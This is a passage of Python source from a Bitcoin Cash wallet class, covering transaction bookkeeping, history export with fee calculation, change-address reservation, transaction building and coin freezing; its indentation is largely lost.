Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs! Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
''' Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets. '''
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
            def txin_get_info(txin):
                prevout_hash = txin['prevout_hash']
                prevout_n = txin['prevout_n']
                ser = prevout_hash + ':%d'%prevout_n
                return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
# Unconditionally invoke the SLP handler. Note that it is a fast &
# cheap no-op if this tx's outputs[0] is not an SLP script.
self.slp.add_tx(tx_hash, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
try: self.txi.pop(tx_hash)
except KeyError: self.print_error("tx was not in input history", tx_hash)
try: self.txo.pop(tx_hash)
except KeyError: self.print_error("tx was not in output history", tx_hash)
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
# inform slp subsystem as well
self.slp.rm_tx(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
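        # Invoked (typically from the synchronizer/network thread) when a tx touching
        # one of our addresses arrives: record it, mark it unverified, and notify any
        # 'payment_received' listeners for addresses that have a pending payment request.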
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
if self.network and self.network.callback_listener_count("payment_received") > 0:
for _, addr, _ in tx.outputs():
status = self.get_request_status(addr) # returns PR_UNKNOWN quickly if addr has no requests, otherwise returns tuple
if status != PR_UNKNOWN:
status = status[0] # unpack status from tuple
self.network.trigger_callback('payment_received', self, addr, status)
def receive_history_callback(self, addr, hist, tx_fees):
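        # Reconcile the server-provided history `hist` for `addr` with what we had:
        # drop txs no longer referenced by any address, register new ones as
        # unverified, and record the fee information the server sent along.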
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
s.discard(addr)
if not s:
# if no address references this tx anymore, kill it
# from txi/txo dicts.
if s is not None:
# We won't keep empty sets around.
self.tx_addr_hist.pop(tx_hash)
# note this call doesn't actually remove the tx from
# storage, it merely removes it from the self.txi
# and self.txo dicts
self.remove_transaction(tx_hash)
self._addr_bal_cache.pop(addr, None) # unconditionally invalidate cache entry
self._history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# add reference in tx_addr_hist
self.tx_addr_hist[tx_hash].add(addr)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is not None and self.txi.get(tx_hash, {}).get(addr) is None and self.txo.get(tx_hash, {}).get(addr) is None:
self.add_transaction(tx_hash, tx)
# Store fees
self.tx_fees.update(tx_fees)
if self.network:
self.network.trigger_callback('on_history', self)
def add_tx_to_history(self, txid):
with self.lock:
for addr in itertools.chain(list(self.txi.get(txid, {}).keys()), list(self.txo.get(txid, {}).keys())):
cur_hist = self._history.get(addr, list())
if not any(True for x in cur_hist if x[0] == txid):
cur_hist.append((txid, 0))
self._history[addr] = cur_hist
def get_history(self, domain=None, *, reverse=False):
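        # Returns a list of (tx_hash, height, conf, timestamp, delta, balance) tuples,
        # oldest-first by default (newest-first when reverse=True), where `balance` is
        # the running balance of `domain` after each tx.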
# get domain
if domain is None:
domain = self.get_addresses()
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]), reverse=True)
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
if not reverse:
h2.reverse()
return h2
def export_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None,
show_addresses=False, decimal_point=8,
*, fee_calc_timeout=10.0, download_inputs=False,
progress_callback=None):
''' Export history. Used by RPC & GUI.
Arg notes:
- `fee_calc_timeout` is used when computing the fee (which is done
asynchronously in another thread) to limit the total amount of time in
seconds spent waiting for fee calculation. The timeout is a total time
allotment for this function call. (The reason the fee calc can take a
long time is for some pathological tx's, it is very slow to calculate
fee as it involves deserializing prevout_tx from the wallet, for each
input).
- `download_inputs`, if True, will allow for more accurate fee data to
be exported with the history by using the Transaction class input
fetcher to download *all* prevout_hash tx's for inputs (even for
inputs not in wallet). This feature requires self.network (ie, we need
to be online) otherwise it will behave as if download_inputs=False.
- `progress_callback`, if specified, is a callback which receives a
single float argument in the range [0.0,1.0] indicating how far along
the history export is going. This is intended for interop with GUI
        code. Note that the progress callback is not guaranteed to be called in the
context of the main thread, therefore GUI code should use appropriate
signals/slots to update the GUI with progress info.
Note on side effects: This function may update self.tx_fees. Rationale:
it will spend some time trying very hard to calculate accurate fees by
examining prevout_tx's (leveraging the fetch_input_data code in the
Transaction class). As such, it is worthwhile to cache the results in
self.tx_fees, which gets saved to wallet storage. This is not very
demanding on storage as even for very large wallets with huge histories,
tx_fees does not use more than a few hundred kb of space. '''
from .util import timestamp_to_datetime
# we save copies of tx's we deserialize to this temp dict because we do
        # *not* want to deserialize tx's in wallet.transactions since that
# wastes memory
local_tx_cache = {}
# some helpers for this function
t0 = time.time()
def time_remaining(): return max(fee_calc_timeout - (time.time()-t0), 0)
class MissingTx(RuntimeError):
''' Can happen in rare circumstances if wallet history is being
radically reorged by network thread while we are in this code. '''
def get_tx(tx_hash):
''' Try to get a tx from wallet, then from the Transaction class
cache if that fails. In either case it deserializes the copy and
puts the deserialized tx in local stack dict local_tx_cache. The
reason we don't deserialize the tx's from self.transactions is that
we do not want to keep deserialized tx's in memory. The
self.transactions dict should contain just raw tx's (not
deserialized). Deserialized tx's eat on the order of 10x the memory
            because of the Python lists, dicts, etc. they contain, per
instance. '''
tx = local_tx_cache.get(tx_hash)
if tx:
return tx
tx = Transaction.tx_cache_get(tx_hash)
if not tx:
tx = copy.deepcopy(self.transactions.get(tx_hash))
if tx:
tx.deserialize()
local_tx_cache[tx_hash] = tx
else:
raise MissingTx(f'txid {tx_hash} dropped out of wallet history while exporting')
return tx
def try_calc_fee(tx_hash):
''' Try to calc fee from cheapest to most expensive calculation.
Ultimately asks the transaction class to look at prevouts in wallet and uses
that scheme as a last (more CPU intensive) resort. '''
fee = self.tx_fees.get(tx_hash)
if fee is not None:
return fee
def do_get_fee(tx_hash):
tx = get_tx(tx_hash)
def try_get_fee(tx):
try: return tx.get_fee()
except InputValueMissing: pass
fee = try_get_fee(tx)
t_remain = time_remaining()
if fee is None and t_remain:
q = queue.Queue()
def done():
q.put(1)
tx.fetch_input_data(self, use_network=bool(download_inputs), done_callback=done)
try: q.get(timeout=t_remain)
except queue.Empty: pass
fee = try_get_fee(tx)
return fee
fee = do_get_fee(tx_hash)
if fee is not None:
self.tx_fees[tx_hash] = fee # save fee to wallet if we bothered to dl/calculate it.
return fee
def fmt_amt(v, is_diff):
if v is None:
return '--'
return format_satoshis(v, decimal_point=decimal_point,
is_diff=is_diff)
# grab history
h = self.get_history(domain, reverse=True)
out = []
n, l = 0, max(1, float(len(h)))
for tx_hash, height, conf, timestamp, value, balance in h:
if progress_callback:
progress_callback(n/l)
n += 1
timestamp_safe = timestamp
if timestamp is None:
timestamp_safe = time.time() # set it to "now" so below code doesn't explode.
if from_timestamp and timestamp_safe < from_timestamp:
continue
if to_timestamp and timestamp_safe >= to_timestamp:
continue
try:
fee = try_calc_fee(tx_hash)
except MissingTx as e:
self.print_error(str(e))
continue
item = {
'txid' : tx_hash,
'height' : height,
'confirmations' : conf,
'timestamp' : timestamp_safe,
'value' : fmt_amt(value, is_diff=True),
'fee' : fmt_amt(fee, is_diff=False),
'balance' : fmt_amt(balance, is_diff=False),
}
if item['height'] > 0:
date_str = format_time(timestamp) if timestamp is not None else _("unverified")
else:
date_str = _("unconfirmed")
item['date'] = date_str
try:
# Defensive programming.. sanitize label.
# The below ensures strings are utf8-encodable. We do this
# as a paranoia measure.
item['label'] = self.get_label(tx_hash).encode(encoding='utf-8', errors='replace').decode(encoding='utf-8', errors='replace')
except UnicodeError:
self.print_error(f"Warning: could not export label for {tx_hash}, defaulting to ???")
item['label'] = "???"
if show_addresses:
tx = get_tx(tx_hash)
input_addresses = []
output_addresses = []
for x in tx.inputs():
if x['type'] == 'coinbase': continue
addr = x.get('address')
                    if addr is None: continue
input_addresses.append(addr.to_ui_string())
for _type, addr, v in tx.outputs():
output_addresses.append(addr.to_ui_string())
item['input_addresses'] = input_addresses
item['output_addresses'] = output_addresses
if fx is not None:
date = timestamp_to_datetime(timestamp_safe)
item['fiat_value'] = fx.historical_value_str(value, date)
item['fiat_balance'] = fx.historical_value_str(balance, date)
item['fiat_fee'] = fx.historical_value_str(fee, date)
out.append(item)
if progress_callback:
progress_callback(1.0) # indicate done, just in case client code expects a 1.0 in order to detect completion
return out
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
if not label:
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if not self.txi.get(tx_hash):
d = self.txo.get(tx_hash, {})
labels = []
for addr in list(d.keys()): # use a copy to avoid possibility of dict changing during iteration, see #1328
label = self.labels.get(addr.to_storage_string())
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
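        # Returns (status, status_str). status values 0-3 index into TX_STATUS above
        # ('Unconfirmed parent', 'Low fee', 'Unconfirmed', 'Not Verified'); values >= 4
        # mean confirmed, in which case status_str is the formatted block timestamp.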
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 3, 'unknown'
fee = self.tx_fees.get(tx_hash)
# we disable fee estimates in BCH for now.
#if fee and self.network and self.network.config.has_fee_estimates():
# size = len(tx.raw)/2
# low_fee = int(self.network.config.dynfee(0)*size/1000)
# is_lowfee = fee < low_fee * 0.5
#else:
# is_lowfee = False
# and instead if it's less than 1.0 sats/B we flag it as low_fee
try:
# NB len(tx.raw) is 2x the byte size as it's hex encoded.
is_lowfee = int(fee) / (int(len(tx.raw)) / 2.0) < 1.0 # if less than 1.0 sats/B, complain. otherwise don't.
except (TypeError, ValueError): # If for some reason fee was None or invalid, just pass on through.
is_lowfee = False
# /
if height < 0:
status = 0
elif height == 0 and is_lowfee:
status = 1
elif height == 0:
status = 2
else:
status = 3
else:
status = 3 + min(conf, 6)
time_str = format_time(timestamp) if timestamp else _("unknown")
status_str = _(TX_STATUS[status]) if status < 4 else time_str
return status, status_str
def relayfee(self):
return relayfee(self.network)
def dust_threshold(self):
return dust_threshold(self.network)
def reserve_change_addresses(self, count, temporary=False):
""" Reserve and return `count` change addresses. In order
of preference, this will return from:
1. addresses 'freed' by `.unreserve_change_address`,
2. addresses in the last 20 (gap limit) of the change list,
3. newly-created addresses.
Of these, only unlabeled, unreserved addresses with no usage history
will be returned. If you pass temporary=False (default), this will
persist upon wallet saving, otherwise with temporary=True the address
will be made available again once the wallet is re-opened.
On non-deterministic wallets, this returns an empty list.
"""
if count <= 0 or not hasattr(self, 'create_new_address'):
return []
with self.lock:
last_change_addrs = self.get_change_addresses()[-self.gap_limit_for_change:]
if not last_change_addrs:
# this happens in non-deterministic wallets but the above
# hasattr check should have caught those.
return []
def gen_change():
try:
while True:
yield self.change_unreserved.pop(0)
except IndexError:
pass
for addr in last_change_addrs:
yield addr
while True:
yield self.create_new_address(for_change=True)
result = []
for addr in gen_change():
if ( addr in self.change_reserved
or addr in self.change_reserved_tmp
or self.get_num_tx(addr) != 0
or addr in result):
continue
addr_str = addr.to_storage_string()
if self.labels.get(addr_str):
continue
result.append(addr)
if temporary:
self.change_reserved_tmp.add(addr)
else:
self.change_reserved.add(addr)
if len(result) >= count:
return result
raise RuntimeError("Unable to generate new addresses") # should not happen
def unreserve_change_address(self, addr):
""" Unreserve an addr that was set by reserve_change_addresses, and
also explicitly reschedule this address to be usable by a future
reservation. Unreserving is appropriate when the address was never
actually shared or used in a transaction, and reduces empty gaps in
the change list.
"""
assert addr in self.get_change_addresses()
with self.lock:
self.change_reserved.discard(addr)
self.change_reserved_tmp.discard(addr)
self.change_unreserved.append(addr)
def get_default_change_addresses(self, count):
""" Return `count` change addresses from the default reserved list,
ignoring and removing used addresses. Reserves more as needed.
The same default change addresses keep getting repeated until they are
actually seen as used in a transaction from the network. Theoretically
this could hurt privacy if the user has multiple unsigned transactions
open at the same time, but practically this avoids address gaps for
normal usage. If you need non-repeated addresses, see
`reserve_change_addresses`.
On non-deterministic wallets, this returns an empty list.
"""
result = []
with self.lock:
for addr in list(self.change_reserved_default):
if len(result) >= count:
break
if self.get_num_tx(addr) != 0:
self.change_reserved_default.remove(addr)
continue
result.append(addr)
need_more = count - len(result)
if need_more > 0:
new_addrs = self.reserve_change_addresses(need_more)
self.change_reserved_default.extend(new_addrs)
result.extend(new_addrs)
return result
def make_unsigned_transaction(self, inputs, outputs, config, fixed_fee=None, change_addr=None, sign_schnorr=None):
''' sign_schnorr flag controls whether to mark the tx as signing with
schnorr or not. Specify either a bool, or set the flag to 'None' to use
whatever the wallet is configured to use from the GUI '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
# check outputs
i_max = None
for i, o in enumerate(outputs):
_type, data, value = o
if value == '!':
if i_max is not None:
raise BaseException("More than one output set to spend max")
i_max = i
# Avoid index-out-of-range with inputs[0] below
if not inputs:
raise NotEnoughFunds()
if fixed_fee is None and config.fee_per_kb() is None:
raise BaseException('Dynamic fee estimates not available')
for item in inputs:
self.add_input_info(item)
# Fee estimator
if fixed_fee is None:
fee_estimator = config.estimate_fee
else:
fee_estimator = lambda size: fixed_fee
if i_max is None:
# Let the coin chooser select the coins to spend
change_addrs = []
if change_addr:
change_addrs = [change_addr]
else:
# Currently the only code that uses this hook is the deprecated
# Cash Shuffle plugin
change_addrs = run_hook("get_change_addrs", self) or []
if not change_addrs:
# hook gave us nothing, so find a change addr from the change
# reservation subsystem
max_change = self.max_change_outputs if self.multiple_change else 1
if self.use_change:
change_addrs = self.get_default_change_addresses(max_change)
else:
change_addrs = []
if not change_addrs:
# For some reason we couldn't get any autogenerated change
# address (non-deterministic wallet?). So, try to find an
# input address that belongs to us.
for inp in inputs:
backup_addr = inp['address']
if self.is_mine(backup_addr):
change_addrs = [backup_addr]
break
else:
# ok, none of the inputs are "mine" (why?!) -- fall back
# to picking first max_change change_addresses that have
# no history
change_addrs = []
for addr in self.get_change_addresses()[-self.gap_limit_for_change:]:
if self.get_num_tx(addr) == 0:
change_addrs.append(addr)
if len(change_addrs) >= max_change:
break
if not change_addrs:
# No unused wallet addresses or no change addresses.
# Fall back to picking ANY wallet address
try:
# Pick a random address
change_addrs = [random.choice(self.get_addresses())]
except IndexError:
change_addrs = [] # Address-free wallet?!
# This should never happen
if not change_addrs:
raise RuntimeError("Can't find a change address!")
assert all(isinstance(addr, Address) for addr in change_addrs)
coin_chooser = coinchooser.CoinChooserPrivacy()
tx = coin_chooser.make_tx(inputs, outputs, change_addrs,
fee_estimator, self.dust_threshold(), sign_schnorr=sign_schnorr)
else:
sendable = sum(map(lambda x:x['value'], inputs))
_type, data, value = outputs[i_max]
outputs[i_max] = (_type, data, 0)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = fee_estimator(tx.estimated_size())
amount = max(0, sendable - tx.output_value() - fee)
outputs[i_max] = (_type, data, amount)
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
# If user tries to send too big of a fee (more than 50 sat/byte), stop them from shooting themselves in the foot
        tx_in_bytes = tx.estimated_size()
        fee_in_satoshis = tx.get_fee()
        sats_per_byte = fee_in_satoshis / tx_in_bytes
        if sats_per_byte > 50:
            raise ExcessiveFee()
# Sort the inputs and outputs deterministically
tx.BIP_LI01_sort()
# Timelock tx to current height.
locktime = self.get_local_height()
if locktime == -1: # We have no local height data (no headers synced).
locktime = 0
tx.locktime = locktime
run_hook('make_unsigned_transaction', self, tx)
return tx
def mktx(self, outputs, password, config, fee=None, change_addr=None, domain=None, sign_schnorr=None):
coins = self.get_spendable_coins(domain, config)
tx = self.make_unsigned_transaction(coins, outputs, config, fee, change_addr, sign_schnorr=sign_schnorr)
self.sign_transaction(tx, password)
return tx
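    # Sketch of the typical send path built on the two methods above (illustrative;
    # `wallet`, `config`, `password`, `addr_text` and `amount_sats` are assumed to be
    # supplied by the caller and are not defined here):
    #
    #   outputs = [(TYPE_ADDRESS, Address.from_string(addr_text), amount_sats)]
    #   tx = wallet.mktx(outputs, password, config)   # selects coins, signs, sorts, sets locktime
    #   # for a sweep, set the value of exactly one output to '!' to spend the maximum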
def is_frozen(self, addr):
''' Address-level frozen query. Note: this is set/unset independent of
'coin' level freezing. '''
assert isinstance(addr, Address)
return addr in self.frozen_addresses
def is_frozen_coin(self, utxo):
''' 'coin' level frozen query. `utxo' is a prevout:n string, or a dict
as returned from get_utxos(). Note: this is set/unset independent of
'address' level freezing. '''
assert isinstance(utxo, (str, dict))
if isinstance(utxo, dict):
name = ("{}:{}".format(utxo['prevout_hash'], utxo['prevout_n']))
ret = name in self.frozen_coins or name in self.frozen_coins_tmp
if ret != utxo['is_frozen_coin']:
self.print_error("*** WARNING: utxo has stale is_frozen_coin flag", name)
utxo['is_frozen_coin'] = ret # update stale flag
return ret
else:
return utxo in self.frozen_coins or utxo in self.frozen_coins_tmp
def set_frozen_state(self, addrs, freeze):
''' Set frozen state of the addresses to `freeze`, True or False. Note
that address-level freezing is set/unset independent of coin-level
freezing, however both must be satisfied for a coin to be defined as
spendable. '''
if all(self.is_mine(addr) for addr in addrs):
if freeze:
self.frozen_addresses |= set(addrs)
else:
self.frozen_addresses -= set(addrs)
frozen_addresses = [addr.to_storage_string()
for addr in self.frozen_addresses]
self.storage.put('frozen_addresses', frozen_addresses)
return True
return False
def set_frozen_coin_state(self, utxos, freeze, *, temporary = False):
'''Set frozen state of the `utxos` to `freeze`, True or False. `utxos`
is a (possibly mixed) list of either "prevout:n" strings and/or
coin-dicts as returned from get_utxos(). Note that if passing prevout:n
strings as input, 'is_mine()' status is not checked for the specified
coin. Also note that coin-level freezing is set/unset independent of
address-level freezing, however both must be satisfied for a coin to be
defined as spendable.
The `temporary` flag only applies if `freeze = True`. In that case,
freezing coins will only affect the in-memory-only frozen set, which
doesn't get saved to storage. This mechanism was added so that plugins
(such as CashFusion) have a mechanism for ephemeral coin freezing that
doesn't persist across sessions.
Note that setting `freeze = False` effectively unfreezes both the
temporary and the permanent frozen coin sets all in 1 call. Thus after a
        call to `set_frozen_coin_state(utxos, False)`, both the temporary and the
persistent frozen sets are cleared of all coins in `utxos`. '''
add_set = self.frozen_coins if not temporary else self.frozen_coins_tmp
def add(utxo):
add_set.add( utxo )
def discard(utxo):
self.frozen_coins.discard( utxo )
self.frozen_coins_tmp.discard( utxo )
apply_operation = add if freeze else discard
original_size = len(self.frozen_coins)
with self.lock:
ok = 0
for utxo in utxos:
if isinstance(utxo, str):
apply_operation( utxo )
ok += 1
elif isinstance(utxo, dict) and self.is_mine(utxo['address']):
txo = "{}:{}".format(utxo['prevout_hash'], utxo['prevout_n'])
apply_operation( txo )
utxo['is_frozen_coin'] = bool(freeze)
ok += 1
if original_size != len(self.frozen_coins):
# Performance optimization: only set storage if the perma-set
# changed.
self.storage.put('frozen_coins', list(self.frozen_coins))
return ok
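    # Sketch: freezing coins for the current session only (illustrative; `wallet`
    # and `coins` as returned from get_utxos() are assumed):
    #
    #   wallet.set_frozen_coin_state(coins, True, temporary=True)   # in-memory only, not saved
    #   ...
    #   wallet.set_frozen_coin_state(coins, False)   # clears both the temporary and persistent sets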
def prepare_for_verifier(self):
# review transactions that are in the history
for addr, hist in self._history.items():
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
with self.lock:
vr = list(self.verified_tx.keys()) + list(self.unverified_tx.keys())
for tx_hash in list(self.transactions):
if tx_hash not in vr:
self.print_error("removing transaction", tx_hash)
self.transactions.pop(tx_hash)
def start_threads(self, network):
self.network = network
if self.network:
self.start_pruned_txo_cleaner_thread()
self.prepare_for_verifier()
self.verifier = SPV(self.network, self)
self.synchronizer = Synchronizer(self, network)
finalization_print_error(self.verifier)
finalization_print_error(self.synchronizer)
network.add_jobs([self.verifier, self.synchronizer])
            self.cashacct.start(self.network)  # start cashacct network-dependent subsystem, network.add_jobs, etc
else:
self.verifier = None
self.synchronizer = None
def stop_threads(self):
if self.network:
            # Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
            # because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
            # Now no references to the synchronizer or verifier
# remain so they will be GC-ed
self.storage.put('stored_height', self.get_local_height())
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.save_change_reservations()
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None):
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
                break  # ok, it's old. no need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
